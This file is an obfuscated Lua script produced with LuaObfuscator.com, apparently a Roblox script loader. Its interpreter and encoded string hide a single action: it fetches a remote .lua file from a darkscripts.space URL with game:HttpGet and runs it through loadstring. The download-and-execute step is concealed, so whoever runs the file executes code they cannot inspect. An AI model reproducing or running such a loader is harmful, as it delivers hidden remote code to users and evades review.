--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v80,v19);v19=nil;v90=1;end end else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/(2^(v32-(2 -(878 -(282 + 595))))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + ((2257 -(1523 + 114)) -(555 + 64)))) ;return v81-(v81%(932 -(857 + 67 + 7))) ;else local v82=568 -(367 + 201) ;local v83;while true do if (v82==(927 -(214 + 713))) then v83=(1 + 1)^(v32-(1 -0)) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (1065 -(68 + 997)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;v37=1;end if (v37==(1 -(350 -(87 + 263)))) then return (v41 * 16777216) + (v40 * 65536) + (v39 * (469 -213)) + v38 ;end end end local function v24() local v42=(618 -(145 + 293)) -((497 -(44 + 386)) + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==2) then v47=v20(v44,16 + 5 ,75 -44 );v48=((v20(v44,24 + 8 )==((1489 -(998 + 488)) -2)) and  -(953 -(255 + 547 + 150))) or (2 -1) ;v42=3;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==((775 -(201 + 571)) + 0)) then if (v47==0) then if (v46==(997 -(915 + 82))) then return v48 * (0 -0) ;else local v105=0;while true do if (v105==(0 + 0)) then v47=1 -0 ;v45=1187 -((2207 -(116 + 1022)) + 118) ;break;end end end elseif (v47==(4643 -2596)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/((793 -(368 + 423))^(163 -111)))) ;end if (1==v42) then v45=19 -(10 + 8) ;v46=(v20(v44,3 -2 ,462 -((1731 -1315) + 16 + 10) ) * ((6 -4)^(14 + 18))) + v43 ;v42=3 -1 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(7 -5)) then v52={};for v92=860 -(814 + 45) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=7 -4 ;end if ((3 -2)==v50) then v51=v3(v16,v18,(v18 + v49) -((4 -3) + 0) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==(885 -(261 + 246 + 378))) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=1081 -(1020 + 60) ;end if (v50==(1426 -(630 + 793))) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 1943 -(1008 + 935) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53~=2) then else for v94= #"{",v23() do local v95=(function() return 0;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do if (v95==1) then while true do if (v96==0) then v97=(function() return v21();end)();if (v20(v97, #"]", #",")==0) then local v142=(function() return 156 -(142 + 14) ;end)();local v143=(function() return;end)();local v144=(function() return;end)();local v145=(function() return;end)();local v146=(function() return;end)();while true do if ((1794 -(1563 + 230))~=v142) then else local v169=(function() return 285 -(134 + 151) ;end)();while true do if ((1665 -(970 + 695))~=v169) then else v145=(function() return nil;end)();v146=(function() return nil;end)();v169=(function() return 1 -0 ;end)();end if (v169~=(1991 -(582 + 1408))) then else v142=(function() return 6 -4 ;end)();break;end end end if ((2 -0)~=v142) then else while true do if (v143==(0 -0)) then local v175=(function() return 1824 -(1195 + 629) ;end)();local v176=(function() return;end)();while true do if (v175~=0) then else v176=(function() return 0;end)();while true do if (v176==(0 -0)) then v144=(function() return v20(v97,243 -(187 + 54) , #"xnx");end)();v145=(function() return v20(v97, #"http",6);end)();v176=(function() return 781 -(162 + 618) ;end)();end if (v176~=(1 + 0)) then else v143=(function() return  #"}";end)();break;end end break;end end end if (v143~=2) then else local v177=(function() return 0;end)();while true do if (v177~=(1 + 0)) then else v143=(function() return  #"-19";end)();break;end if (v177~=(0 -0)) then else if (v20(v145, #",", #"!")~= #"|") then else v146[2 -0 ]=(function() return v59[v146[2]];end)();end if (v20(v145,1 + 1 ,2)== #"|") then v146[ #"gha"]=(function() return v59[v146[ #"xxx"]];end)();end v177=(function() return 1;end)();end end end if (v143== #",") then local v178=(function() return 1636 -(1373 + 263) ;end)();local v179=(function() return;end)();while true do if (v178~=(1000 -(451 + 549))) then else v179=(function() return 0;end)();while true do if (v179==(0 + 0)) then v146=(function() return {v22(),v22(),nil,nil};end)();if (v144==(0 -0)) then local v184=(function() return 1384 -(746 + 638) ;end)();local v185=(function() return;end)();while true do if (v184==0) then v185=(function() return 0;end)();while true do if (v185==0) then v146[ #"xnx"]=(function() return v22();end)();v146[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v144== #"]") then v146[ #"-19"]=(function() return v23();end)();elseif (v144==(1 + 1)) then v146[ #"nil"]=(function() return v23() -((2 -0)^16) ;end)();elseif (v144== #"91(") then local v190=(function() return 0;end)();local v191=(function() return;end)();while true do if (v190==(341 -(218 + 123))) then v191=(function() return 0;end)();while true do if ((1581 -(1535 + 46))==v191) then v146[ #"xnx"]=(function() return v23() -((2 + 0)^(3 + 13)) ;end)();v146[ #"0313"]=(function() return v22();end)();break;end end break;end end end v179=(function() return 1;end)();end if (v179==1) then v143=(function() return 2;end)();break;end end break;end end end if (v143~= #"xxx") then else if (v20(v145, #"gha", #"nil")== #"<") then v146[ #"http"]=(function() return v59[v146[ #"0836"]];end)();end v54[v94]=(function() return v146;end)();break;end end break;end if (v142==0) then local v170=(function() return 0;end)();while true do if (v170==0) then v143=(function() return 0;end)();v144=(function() return nil;end)();v170=(function() return 561 -(306 + 254) ;end)();end if (v170~=(1 + 0)) then else v142=(function() return 1 -0 ;end)();break;end end end end end break;end end break;end if (v95==0) then local v106=(function() return 1467 -(899 + 568) ;end)();while true do if (v106~=1) then else v95=(function() return 1 + 0 ;end)();break;end if (v106==0) then v96=(function() return 0;end)();v97=(function() return nil;end)();v106=(function() return 2 -1 ;end)();end end end end end for v98= #"[",v23() do v55[v98-#"{" ]=(function() return v28();end)();end return v57;end if (v53== #"{") then local v87=(function() return 603 -(268 + 335) ;end)();while true do if (v87~=(290 -(60 + 230))) then else v58=(function() return v23();end)();v59=(function() return {};end)();v87=(function() return 573 -(426 + 146) ;end)();end if (v87~=1) then else for v107= #",",v58 do local v108=(function() return 0 + 0 ;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v108==(1457 -(282 + 1174))) then v111=(function() return nil;end)();while true do if ( #":"==v109) then if (v110== #"}") then v111=(function() return v21()~=(811 -(569 + 242)) ;end)();elseif (v110==(5 -3)) then v111=(function() return v24();end)();elseif (v110== #"xnx") then v111=(function() return v25();end)();end v59[v107]=(function() return v111;end)();break;end if (v109==0) then local v148=(function() return 0;end)();while true do if (v148==0) then v110=(function() return v21();end)();v111=(function() return nil;end)();v148=(function() return 1;end)();end if (v148==1) then v109=(function() return  #"~";end)();break;end end end end break;end if (v108==0) then v109=(function() return 0;end)();v110=(function() return nil;end)();v108=(function() return 1;end)();end end end v57[ #"xxx"]=(function() return v21();end)();v87=(function() return 1 + 1 ;end)();end if (v87==(1026 -(706 + 318))) then v53=(function() return 1253 -(721 + 530) ;end)();break;end end end if (v53==0) then local v88=(function() return 0;end)();local v89=(function() return;end)();while true do if (v88~=(1271 -(945 + 326))) then else v89=(function() return 0 -0 ;end)();while true do if (v89~=(1 + 0)) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v89=(function() return 2;end)();end if (v89==(700 -(271 + 429))) then v54=(function() return {};end)();v55=(function() return {};end)();v89=(function() return 1 + 0 ;end)();end if ((1502 -(1408 + 92))~=v89) then else v53=(function() return  #"]";end)();break;end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1087 -(461 + 625) ];local v64=v60[1290 -(993 + 295) ];local v65=v60[1 + 2 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1172 -(418 + 753) ;local v71= -(1 + 0);local v72={};local v73={...};local v74=v12("#",...) -(2 -1) ;local v75={};local v76={};for v84=0 + (947 -(245 + 702)) ,v74 do if ((v84>=v68) or (983==1808)) then v72[v84-v68 ]=v73[v84 + 1 + 0 ];else v76[v84]=v73[v84 + (530 -(406 + 123)) ];end end local v77=(v74-v68) + (1770 -(1749 + 20)) ;local v78;local v79;while true do v78=v66[v70];v79=v78[1 + 0 ];if ((v79<=(1329 -(1249 + 73))) or (2150<=1197)) then if (v79<=(2 + 1)) then if ((3769>=1173) and (v79<=(1146 -(466 + 679)))) then if ((1485==1485) and (v79==(0 -(0 -0)))) then local v112=0 -0 ;local v113;local v114;local v115;local v116;while true do if ((v112==(1902 -(106 + 1794))) or (3315<=2782)) then for v165=v113,v71 do local v166=0 + 0 ;while true do if (v166==(0 + 0)) then v116=v116 + (2 -1) ;v76[v165]=v114[v116];break;end end end break;end if (v112==(1203 -(373 + 829))) then v71=(v115 + v113) -(2 -(1 + 0)) ;v116=114 -(4 + 110) ;v112=586 -(57 + (2425 -(260 + 1638))) ;end if (v112==((1867 -(382 + 58)) -(41 + 1386))) then v113=v78[105 -(17 + 86) ];v114,v115=v69(v76[v113](v13(v76,v113 + 1 ,v78[3 + 0 ])));v112=1 -0 ;end end else v76[v78[2 -0 ]]=v62[v78[339 -(144 + 192) ]];end elseif (v79>(218 -(42 + (557 -383)))) then local v119=0 -(0 + 0) ;local v120;while true do if ((0 + 0)==v119) then v120=v78[168 -(122 + 44) ];v76[v120]=v76[v120](v13(v76,v120 + (1 -0) ,v71));break;end end else local v121=0 + 0 ;local v122;local v123;local v124;local v125;while true do if ((v121==(3 -2)) or (876>=2964)) then v71=(v124 + v122) -(1 + 0) ;v125=0 + 0 ;v121=1 + 1 ;end if (((0 -0)==v121) or (2232>2497)) then v122=v78[2 + 0 ];v123,v124=v69(v76[v122](v13(v76,v122 + ((135 -69) -(30 + 35)) ,v78[(8 -5) + 0 ])));v121=(2463 -(902 + 303)) -((2289 -1246) + 214) ;end if (v121==(5 -3)) then for v167=v122,v71 do local v168=1933 -(565 + (3294 -1926)) ;while true do if (v168==(0 -0)) then v125=v125 + (3 -(1 + 1)) ;v76[v167]=v123[v125];break;end end end break;end end end elseif ((v79<=(1217 -(323 + 889))) or (2110<=332)) then if (v79>(10 -(1696 -(1121 + 569)))) then v76[v78[(796 -(22 + 192)) -(361 + 219) ]]=v78[323 -(53 + 267) ]~=(0 + 0) ;else do return;end end elseif (v79>(419 -(15 + 398))) then v76[v78[984 -(18 + 964) ]]=v78[11 -(691 -(483 + 200)) ];else local v129=0 + 0 ;local v130;local v131;while true do if ((3686>3172) and (v129==1)) then v76[v130 + (477 -(41 + 435)) ]=v131;v76[v130]=v131[v78[(1466 -(1404 + 59)) + 1 ]];break;end if ((v129==(0 + 0)) or (4474<820)) then v130=v78[2 + 0 ];v131=v76[v78[1 + 2 ]];v129=1;end end end elseif (v79<=((2356 -1495) -(20 + 830))) then if (v79<=(8 + 1)) then if ((4279>=2882) and (v79>(134 -((155 -39) + 10)))) then v76[v78[1 + 1 ]]=v62[v78[270 -(176 + 91) ]];else v76[v78[740 -(542 + 196) ]]=v78[4 -1 ]~=(0 -0) ;end elseif (v79==(3 + (772 -(468 + 297)))) then v76[v78[(564 -(334 + 228)) + 0 ]]();else v76[v78[2 + 0 ]]();end elseif (v79<=(5 + (26 -18))) then if (v79>(31 -19)) then do return;end else local v135=(0 -0) -(0 -0) ;local v136;while true do if (v135==0) then v136=v78[1553 -(1126 + 425) ];v76[v136]=v76[v136](v13(v76,v136 + (406 -(118 + 287)) ,v71));break;end end end elseif (v79==(54 -40)) then local v137=(319 + 802) -(118 + (1239 -(141 + 95))) ;local v138;local v139;while true do if ((v137==(0 -0)) or (2029>=3521)) then v138=v78[379 -(142 + 235) ];v139=v76[v78[5 -2 ]];v137=1;end if (v137==(4 -3)) then v76[v138 + (2 -1) ]=v139;v76[v138]=v139[v78[1 + 3 ]];break;end end else v76[v78[979 -(553 + 424) ]]=v78[614 -(592 + 10 + 9) ];end v70=v70 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F65393Q356264372D376338662D346339362D626539372D2Q3663373564636265362Q645F39332Q3633303134393735383231343239362E6C756100093Q0012013Q00013Q001201000100023Q00200E000100010003001207000300044Q0005000400014Q0002000100044Q00035Q00022Q000B3Q000100012Q000D3Q00017Q00",v9(),...);
